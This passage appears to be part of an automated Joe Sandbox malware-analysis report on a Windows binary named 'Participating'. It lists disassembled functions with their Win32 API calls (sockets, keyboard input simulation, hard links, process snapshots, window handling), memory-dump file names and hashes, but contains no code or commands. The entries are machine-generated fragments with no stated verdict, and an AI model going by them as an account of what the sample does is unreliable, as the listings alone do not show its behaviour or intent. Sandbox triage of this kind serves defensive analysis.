                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                  • Opcode ID: 55f6c4cec2ea8017ee13177fd597dba4802b07ba9780ea0d5202a36f90708221
                                                                                                                                                                                                                                                                  • Instruction ID: ba892dd077fcda4425e452c8f44390534a1b73cd04e05d6ea5e80d9d0422f33c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55f6c4cec2ea8017ee13177fd597dba4802b07ba9780ea0d5202a36f90708221
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0514971508340AFC710EF25C886A6BBBE8FF89754F40491DF989D7261EB71D904CBA2
                                                                                                                                                                                                                                                                  Function 00D21711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5f587902904be1b18d22a27a1c3be93a6e93667f043bde8400cf893dfb0d10b3
                                                                                                                                                                                                                                                                  • Instruction ID: 0cab368826744db76e0ed71bdb75869b85c823d78dc8d35afe9a18f0b74d29a8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f587902904be1b18d22a27a1c3be93a6e93667f043bde8400cf893dfb0d10b3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9411D39500120BADB316BB9BC82BBF7AA4EF75734F288225F418D72D1DA3549418671
                                                                                                                                                                                                                                                                  Function 00D62533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00D6255A
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D62568
                                                                                                                                                                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D625E7
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D625F1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                  • Opcode ID: f8eeaa85d9097121ea8b3e340fbc1cfd0882614486e8a0c1622136a6a2fd9cda
                                                                                                                                                                                                                                                                  • Instruction ID: e95f5dffb454086e378b9b4f940c6f9b9a7fe188cd4c31602aa407b00d23689d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8eeaa85d9097121ea8b3e340fbc1cfd0882614486e8a0c1622136a6a2fd9cda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41C135A00600AFE720AF24C896F3677E5AF04758F58C448F91A8F3D2D772ED428BA1
                                                                                                                                                                                                                                                                  Function 00D76CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D76D1A
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D76D4D
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00D76DBA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                  • Opcode ID: 28f36ea30b622b0047f511af02bd3f3a8bc1da0bb895c84f85f9892c73313c84
                                                                                                                                                                                                                                                                  • Instruction ID: dd0db16cd70a728cd1215edf19a2f1e8f4f9a2a9c0fa828f6f91175391ca59c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28f36ea30b622b0047f511af02bd3f3a8bc1da0bb895c84f85f9892c73313c84
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29510975A00609EFCF25DF64D8809AE7BB6FF44760F248159F9599B290E730ED81CB60
                                                                                                                                                                                                                                                                  Function 00D1B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0f13fff8aa0e07d937848a3199ef9450cf6d6fa9982d8d2566799d740336efd3
                                                                                                                                                                                                                                                                  • Instruction ID: cfb8390324213a5e631182adb8b1e7d3fc8d1a99d22dd6f911150fd817cb3eb5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f13fff8aa0e07d937848a3199ef9450cf6d6fa9982d8d2566799d740336efd3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF41FC71940704BFD724AF78DC41BAA77EDEF44720F10452AF155DB291DB72994187B0
                                                                                                                                                                                                                                                                  Function 00D5611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D561C8
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00D561EE
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D56213
                                                                                                                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D5623F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                  • Opcode ID: ffe1d060d8a15518c71f7960195bbebbf2aa34931feda18f3f25b0b4e4474d8a
                                                                                                                                                                                                                                                                  • Instruction ID: 5253dd5ad5a261cf0105ee8f67f2609a79b195c83b6f3b89ade3e62984b4762d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffe1d060d8a15518c71f7960195bbebbf2aa34931feda18f3f25b0b4e4474d8a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00412B39600650DFCF11DF15C585A59BBE2EF89714B188488EC4AAF362CB34FD45DBA1
                                                                                                                                                                                                                                                                  Function 00D4B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00D4B473
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 00D4B48F
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00D4B4FD
                                                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00D4B54F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                                                  • Opcode ID: d361362d9579a92f87e27fc52de38bbc5cc4074f6846b9ccc3b1c0d2388622fe
                                                                                                                                                                                                                                                                  • Instruction ID: 885a6b6ecf85dcbcfe949bef7372e52efb3febe7c3a8fe263fb98ad9846d3653
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d361362d9579a92f87e27fc52de38bbc5cc4074f6846b9ccc3b1c0d2388622fe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31F670A406086BFF308B2588057FABBB6EF69334F08421BE49A961D6D774C9858771
                                                                                                                                                                                                                                                                  Function 00D4B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00D4B5B8
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D4B5D4
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D4B63B
                                                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00D4B68D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6c9462d722f86d0c519ada8b0c40c2dd55943287d31ed59236f88db465ff7753
                                                                                                                                                                                                                                                                  • Instruction ID: 4275317d661973a083c5760a9b52ab1f60de20ce23040d79f28da9aa2529545f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c9462d722f86d0c519ada8b0c40c2dd55943287d31ed59236f88db465ff7753
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D312B309406586FFF348B6888057FE7BB6EFA5330F09422BE4859A1D1D374CA868B75
                                                                                                                                                                                                                                                                  Function 00D780AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00D780D4
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D7814A
                                                                                                                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00D7815A
                                                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00D781C6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                  • Opcode ID: 42ee93e984b79add07bd5c6a9510ee26ec6d9ae0e280f1d814c8ad5225f4318a
                                                                                                                                                                                                                                                                  • Instruction ID: c9d26658430e28ac5d858759634ec93b44486d50347ea4dc4a1df051938a697e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42ee93e984b79add07bd5c6a9510ee26ec6d9ae0e280f1d814c8ad5225f4318a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC418B31A40315DFCB11CF58C888AA9B7B5FF45310F5881A9E958DB361EB30E842DF60
                                                                                                                                                                                                                                                                  Function 00D72176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00D72187
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D443AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetCurrentThreadId.KERNEL32 ref: 00D443B4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D42F00), ref: 00D443BB
                                                                                                                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00D7219B
                                                                                                                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00D721E8
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00D721EE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9f3ee09ca94ddb03c8e6f255f89fa5a34749b9edb5e172daed4f7c9f356fe39b
                                                                                                                                                                                                                                                                  • Instruction ID: a4d5c62f0f7806cee11f7de147332e3039ab3a89b2ad5a632a150e645323a3f1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f3ee09ca94ddb03c8e6f255f89fa5a34749b9edb5e172daed4f7c9f356fe39b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3314471D00249AFCB04DFAAC885DAEB7FDEF48304B54846AE419E7211EB71DE45DBA0
                                                                                                                                                                                                                                                                  Function 00D4E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E8E2
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E8F9
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E924
                                                                                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00D4E92F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4654a427ce2cda2512823543ab2398efdee7adb35416e7ce844639bc7b636eb9
                                                                                                                                                                                                                                                                  • Instruction ID: d22e6e257b70bca164247ffef4a3e3884378ed55dbba55fb364468a49c7f1f24
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4654a427ce2cda2512823543ab2398efdee7adb35416e7ce844639bc7b636eb9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F21A172D00214BFDB10AFA8D982BAEBBF9EF55350F144065E908AB281D6709E418BB1
                                                                                                                                                                                                                                                                  Function 00D79A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D79A5D
                                                                                                                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D79A72
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D79ABA
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00D79AF0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                  • Opcode ID: e4e214f5d0c611a39382b05bd699dc358c0170746de644fee0127f7d3c4e360f
                                                                                                                                                                                                                                                                  • Instruction ID: b543d39be7f316e19d4e64c3c6c6c73591a5204159076699879a75e86b548a5b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4e214f5d0c611a39382b05bd699dc358c0170746de644fee0127f7d3c4e360f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D221A036501118EFCF258F54C858EFABBBAEF09310F448155F90987261E7309950DBB0
                                                                                                                                                                                                                                                                  Function 00D4DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00D7DC30), ref: 00D4DBA6
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D4DBB5
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D4DBC4
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00D7DC30), ref: 00D4DC21
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
